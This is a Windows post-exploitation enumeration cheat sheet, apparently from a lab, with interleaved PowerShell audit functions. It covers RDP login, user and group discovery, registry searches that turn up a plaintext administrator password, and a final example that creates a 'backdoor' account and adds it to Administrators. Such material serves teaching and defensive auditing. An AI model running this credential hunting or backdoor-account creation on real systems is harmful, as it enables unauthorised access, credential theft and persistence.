
Windows Enumeration

Overview

Post-exploitation enumeration commands for Windows systems, covering system information, user and group discovery, credential hunting, and basic user management.

Commands are provided in both CMD and PowerShell where applicable.


Remote Access

RDP from Linux

xfreerdp /v:TARGET_IP /u:USERNAME /p:PASSWORD

RDP Example

xfreerdp /v:10.12.15.23 /u:Peggy /p:g0u567

System Information

Get Computer Name

:: CMD
echo %COMPUTERNAME%

:: Example
C:\Users\Peggy> echo %COMPUTERNAME%
COMPUTER-109

# PowerShell
$env:COMPUTERNAME

# Example
PS C:\Users\Peggy> $env:COMPUTERNAME
COMPUTER-109

Get OS Version

:: CMD
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

:: Example
C:\Users\Peggy> systeminfo | findstr /B /C:"OS Name" /B /C:"OS Version"
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134

# PowerShell
(Get-WmiObject -Class Win32_OperatingSystem).Version

# Example
PS C:\Users\Peggy> (Get-WmiObject -Class Win32_OperatingSystem).Version
10.0.17134

User Enumeration

Get Current User's SID and RID

A SID (Security Identifier) uniquely identifies a user or group.

The RID (Relative Identifier) is the last numeric component of the SID and identifies the account within the domain.

RID value 500 is always the built-in Administrator; RID values 1000+ are regular user accounts.

S-1-5-21-4100474243-2059586340-3489691707-1001
│   │ │  └──────────────────────────────┘ └──┘
│   │ │          Three sub-authorities      RID
│   │ └─ Sub-authority class (21 = domain/local)
│   └─── Identifier authority (5 = NT)
└─────── Literal prefix (S-1)

:: CMD — show current user SID
whoami /user

:: Example
C:\Users\Peggy> whoami /user

USER INFORMATION
----------------

User Name          SID
================== ==============================================
computer-109\peggy S-1-5-21-4100474243-2059586340-3489691707-1001

Literal Prefix: S-1
Identifier Authority: 5
Sub Authority Indicating the class of ID: 21
Three Sub Authorities for Uniqueness: 4100474243-2059586340-3489691707
Relative ID: 1001

# PowerShell — show SID and extract RID
$user = "USERNAME"
$sid = (Get-WmiObject Win32_UserAccount | Where-Object { $_.Name -eq $user }).SID
$rid = $sid.Split("-")[-1]
$sid
$rid

# Example
PS C:\Users\Peggy> $user = "Peggy"
$sid = (Get-WmiObject Win32_UserAccount | Where-Object { $_.Name -eq $user }).SID
$sid
$rid = $sid.Split("-")[-1]
$rid

S-1-5-21-4100474243-2059586340-3489691707-1001
1001
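The split-and-index approach above is enough to pull out the RID, but it is easy to get confused about which field is which once a SID has a different number of sub-authorities (for example S-1-5-18 for LocalSystem, or S-1-5-32-544 for BUILTIN\Administrators). The following PowerShell function is an added example, not code from the original page: it validates the string, breaks it into the components labelled in the diagram above, and classifies the RID using the page's rules (500 = built-in Administrator, 1000 and above = user-created). The 501 = Guest mapping and the note that S-1-5-32 is the BUILTIN domain are documented Windows facts added here; the function name `ConvertFrom-SidString` is my own.

```powershell
# Added example (not part of the original page): parse a SID string into its
# components and classify the RID. Function name is hypothetical.
function ConvertFrom-SidString {
    param(
        [Parameter(Mandatory)]
        [string]$Sid
    )

    # Expected shape: S-<revision>-<identifier authority>-<sub-authority>[-<sub-authority>...]
    if ($Sid -notmatch '^S-(\d+)-(\d+)(?:-\d+)+$') {
        throw "Not a valid SID string: $Sid"
    }

    $parts = $Sid.Split('-')
    # $parts[0] = 'S', [1] = revision (the "1" in the S-1 prefix),
    # [2] = identifier authority, [3..] = sub-authorities, the last being the RID.
    # Sub-authorities are 32-bit unsigned, so [uint32] (4100474243 overflows [int]).
    $subAuthorities = @($parts[3..($parts.Length - 1)] | ForEach-Object { [uint32]$_ })
    $rid = $subAuthorities[-1]

    # RID rules from the page (500, 1000+); 501 = Guest is a documented well-known RID.
    $ridClass = switch ($rid) {
        500     { 'Built-in Administrator' }
        501     { 'Built-in Guest' }
        default {
            if ($rid -ge 1000) { 'User-created account' } else { 'Other well-known/built-in RID' }
        }
    }

    # The middle sub-authorities (between the class and the RID) identify the
    # machine or domain; a short SID such as S-1-5-18 has none.
    $domainId = if ($subAuthorities.Length -ge 3) {
        $subAuthorities[1..($subAuthorities.Length - 2)] -join '-'
    } else { '' }

    [pscustomobject]@{
        Sid                 = $Sid
        Revision            = [int]$parts[1]
        IdentifierAuthority = [int64]$parts[2]
        SubAuthorityClass   = $subAuthorities[0]      # 21 = domain/local, 32 = BUILTIN
        DomainIdentifier    = $domainId
        Rid                 = $rid
        RidClass            = $ridClass
    }
}

# Usage: the SID from the example above, the built-in Administrator SID from the
# ProfileList section, and the SID of whoever is running the script.
ConvertFrom-SidString -Sid 'S-1-5-21-4100474243-2059586340-3489691707-1001'
ConvertFrom-SidString -Sid 'S-1-5-21-4100474243-2059586340-3489691707-500'
ConvertFrom-SidString -Sid ([System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value)
```

Reading the current user's SID through `WindowsIdentity` avoids the WMI query entirely and does not depend on the account name matching the `Name` property of `Win32_UserAccount`, which is useful when the session runs under a domain account that the WMI filter above would not find.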

Get List of All Local Users

:: CMD
net users

:: Example
C:\Users\Peggy>net users

User accounts for \\COMPUTER-109

-------------------------------------------------------------------------------
Administrator            administrator2           DefaultAccount
Fred                     Gordon                   Guest
IMLUser                  Peggy                    WDAGUtilityAccount
The command completed successfully.

Get Service by Caption

To find the name of the service with the caption "Security Center":

  1. Query all services using Get-WmiObject -Class Win32_Service.
  2. Filter for the service where Caption matches "Security Center".
  3. Display the Name, DisplayName, and State (running/stopped) of the service.

# PowerShell
Get-WmiObject -Class Win32_Service |
  Where-Object { $_.Caption -eq "Security Center" } |
  Select-Object -Property Name, DisplayName, State

# Example: Get name of the service with the caption "Security Center"
PS C:\Users\Peggy> Get-WmiObject -Class Win32_Service | Where-Object { $_.Caption -eq "Security Center" } | Select-Object -Property Name, DisplayName, State

Name   DisplayName     State
----   -----------     -----
wscsvc Security Center Running

Group Enumeration

Get List of All Local Groups

:: CMD
net localgroup

:: Example
C:\Users\Peggy>net localgroup

Aliases for \\COMPUTER-109

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Finance
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Marketing
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Remote Management Users
*Replicator
*Sales
*System Managed Accounts Group
*Users
The command completed successfully.

Get List of Members of a Specific Group

:: CMD
net localgroup GROUPNAME

:: Example: Get members of group "Sales"
C:\Users\Peggy>net localgroup Sales
Alias name     Sales
Comment

Members

-------------------------------------------------------------------------------
Gordon
The command completed successfully.

# PowerShell
Get-LocalGroupMember -Group "GROUPNAME"

# Example: Get members of group "Sales"
PS C:\Users\Peggy> Get-LocalGroupMember -Group "Sales"

ObjectClass Name                PrincipalSource
----------- ----                ---------------
User        COMPUTER-109\Gordon Local  

Get All Groups a User Belongs To

# PowerShell
# -ErrorAction SilentlyContinue: Get-LocalGroupMember throws when a group holds an
# orphaned SID it cannot resolve, which would otherwise abort the loop early.
Get-LocalGroup | ForEach-Object {
    $group = $_
    if ((Get-LocalGroupMember -Group $group.Name -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -eq "$env:COMPUTERNAME\USERNAME" })) {
        $group.Name
    }
}

# Example: Get all groups that Fred is a member of:
PS C:\Users\Peggy> Get-LocalGroup | ForEach-Object {
    $group = $_
    if ((Get-LocalGroupMember -Group $group.Name | Where-Object { $_.Name -eq "COMPUTER-109\Fred" })) {
        $group.Name
    }
}
Finance
Users

Identify Administrator Accounts via Registry

Administrator accounts can be identified by looking up SID-to-profile mappings in the registry under:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList

RID 500 is the built-in Administrator. Any other SID with a profile path under C:\Users\ is a user-created account, and it is a user-created administrator if that account is also a member of the Administrators group.

Each subkey is a SID. Check ProfileImagePath to map SIDs to usernames:

(built-in)
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-4100474243-2059586340-3489691707-500 -> ProfileImagePath=C:\Users\Administrator

(user-created)
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-4100474243-2059586340-3489691707-1020 -> ProfileImagePath=C:\Users\administrator2
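Doing the cross-reference by hand (list the Administrators group, then look each SID up under ProfileList) is tedious, so here is a PowerShell function, written for this page rather than taken from it, that automates the check described in this section and in "Get All Groups a User Belongs To". It builds a SID-to-ProfileImagePath map from the ProfileList key quoted above, then walks the local Administrators group with `Get-LocalGroupMember` (whose output carries a `SID` property) and labels each member as the built-in RID 500 account, a user-created account (RID 1000+), or some other well-known principal. It assumes the `Microsoft.PowerShell.LocalAccounts` module is available (Windows 10 / Server 2016 and later); the function name `Get-LocalAdminAudit` is my own.

```powershell
# Added example (not part of the original page): map local Administrators
# members to their ProfileList entries. Function name is hypothetical.
function Get-LocalAdminAudit {
    param([string]$Group = 'Administrators')

    $profileListKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList'

    # Each subkey name under ProfileList is a SID; ProfileImagePath is the profile
    # folder (the registry provider returns REG_EXPAND_SZ values already expanded).
    $profiles = @{}
    Get-ChildItem -Path $profileListKey -ErrorAction SilentlyContinue | ForEach-Object {
        $path = (Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue).ProfileImagePath
        if ($path) { $profiles[$_.PSChildName] = $path }
    }

    # -ErrorAction SilentlyContinue: the cmdlet throws on orphaned SIDs it cannot
    # resolve, and one bad entry should not abort the whole audit.
    Get-LocalGroupMember -Group $Group -ErrorAction SilentlyContinue | ForEach-Object {
        $sid = $_.SID.Value
        $rid = [int]($sid.Split('-')[-1])

        $kind = if ($rid -eq 500)      { 'Built-in Administrator' }
                elseif ($rid -ge 1000) { 'User-created' }
                else                   { 'Well-known/built-in' }

        # Domain principals and accounts that never logged on have no local profile.
        $profilePath = if ($profiles.ContainsKey($sid)) { $profiles[$sid] } else { '(no local profile)' }

        [pscustomobject]@{
            Name            = $_.Name
            ObjectClass     = $_.ObjectClass
            PrincipalSource = $_.PrincipalSource
            SID             = $sid
            RID             = $rid
            Kind            = $kind
            ProfilePath     = $profilePath
        }
    }
}

Get-LocalAdminAudit | Format-Table -AutoSize
```

On the host used in the examples above this would list both `COMPUTER-109\Administrator` (RID 500, profile C:\Users\Administrator) and `COMPUTER-109\administrator2` (RID 1020, profile C:\Users\administrator2), which is exactly the pair of accounts an administrator reviewing local admin membership would want to see side by side. A member whose `Kind` is "User-created" and whose profile path is "(no local profile)" is worth a second look: it is an admin account that has never logged on interactively.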


Credential Hunting

Check Stored Credentials (Windows Credential Manager)

:: CMD
cmdkey /list

:: Example: Check if there are any stored credentials
C:\Users\Peggy> cmdkey /list

Currently stored credentials:

* NONE *

Search Registry for Passwords

Registry keys sometimes contain plaintext passwords stored by applications or during setup.

:: CMD — search Local Machine hive
reg query HKLM /f password /t REG_SZ /s

:: CMD — search Current User hive
reg query HKCU /f password /t REG_SZ /s

:: CMD — search for a specific username
reg query HKLM /f USERNAME /t REG_SZ /s

Tip

Look for hits under HKLM\SYSTEM\Setup\ — credentials are sometimes stored there during first-boot configuration and never cleaned up.

Search Example

In this example, credentials are found for administrator2.

:: CMD
C:\Users\Peggy>reg query HKLM /f administrator2 /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\CrawlScopeManager\Windows\SystemIndex\DefaultRules\5
    URL    REG_SZ    file:///C:\[327290ed-ef22-409c-aeea-0d163d308bb7]\Users\administrator2\AppData\

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\CrawlScopeManager\Windows\SystemIndex\WorkingSetRules\5
    URL    REG_SZ    file:///C:\[327290ed-ef22-409c-aeea-0d163d308bb7]\Users\administrator2\AppData\

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\Gather\Windows\SystemIndex\Sites\LocalHost\Paths\4
    Path    REG_SZ    file:///C:\[327290ed-ef22-409c-aeea-0d163d308bb7]\Users\administrator2\AppData\

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Search\CrawlScopeManager\Windows\SystemIndex\DefaultRules\5
    URL    REG_SZ    file:///C:\[327290ed-ef22-409c-aeea-0d163d308bb7]\Users\administrator2\AppData\

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Search\CrawlScopeManager\Windows\SystemIndex\WorkingSetRules\5
    URL    REG_SZ    file:///C:\[327290ed-ef22-409c-aeea-0d163d308bb7]\Users\administrator2\AppData\

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Search\Gather\Windows\SystemIndex\Sites\LocalHost\Paths\4
    Path    REG_SZ    file:///C:\[327290ed-ef22-409c-aeea-0d163d308bb7]\Users\administrator2\AppData\

HKEY_LOCAL_MACHINE\SYSTEM\Setup\FirstBoot\Cleanup
    administrator2    REG_SZ    h0us323

End of search: 13 match(es) found.
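The `reg query /f` search above has to be repeated once per account name. As an added example, not taken from the page, the PowerShell function below does the equivalent hygiene check from the administrator's side: it reads the local account list with `Get-LocalUser`, walks the `HKLM:\SYSTEM\Setup` subtree that the tip above singles out, and reports every REG_SZ value whose name matches a local account, so the leftover value can be removed. It deliberately reports only the length of the matched value rather than its content, so the output can go into a ticket without copying a secret into it. The function name `Find-LeftoverSetupCredential` and the `-Hive` parameter are my own; the default hive path comes from the example output above.

```powershell
# Added example (not part of the original page): find string values under
# HKLM\SYSTEM\Setup whose value name is a local account name. Function name
# and parameter are hypothetical.
function Find-LeftoverSetupCredential {
    param([string]$Hive = 'HKLM:\SYSTEM\Setup')

    # Local account names to match against value names (e.g. administrator2 in the
    # example above). -contains is case-insensitive, like the registry itself.
    $accounts = @((Get-LocalUser).Name)

    # Include the root key as well as every subkey; skip keys we lack rights to read.
    $keys = @(Get-Item -Path $Hive -ErrorAction SilentlyContinue) +
            @(Get-ChildItem -Path $Hive -Recurse -ErrorAction SilentlyContinue)

    foreach ($key in $keys) {
        foreach ($valueName in $key.GetValueNames()) {
            # Only plain REG_SZ values, matching the /t REG_SZ filter used above
            if ($key.GetValueKind($valueName) -ne 'String') { continue }
            if ($accounts -contains $valueName) {
                [pscustomobject]@{
                    Key         = $key.Name
                    ValueName   = $valueName
                    # Length only: the finding is enough to act on without
                    # echoing the stored string to the console or a log.
                    ValueLength = ([string]$key.GetValue($valueName)).Length
                }
            }
        }
    }
}

Find-LeftoverSetupCredential | Format-Table -AutoSize
```

Against the host in the example above this returns one row, `HKEY_LOCAL_MACHINE\SYSTEM\Setup\FirstBoot\Cleanup` with value name `administrator2`, which is the entry to delete (and the account whose password should be rotated, since anyone who could read that key has seen it).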

User Management

These commands require an elevated CMD prompt (run as Administrator).

Create a New User

:: CMD
net user USERNAME PASSWORD /add

Add a User to a Group

:: CMD
net localgroup GROUPNAME USERNAME /add

Add User Example

Create a user and add it to the Administrators group.

:: CMD
net user backdoor P@ssw0rd /add
net localgroup Administrators backdoor /add
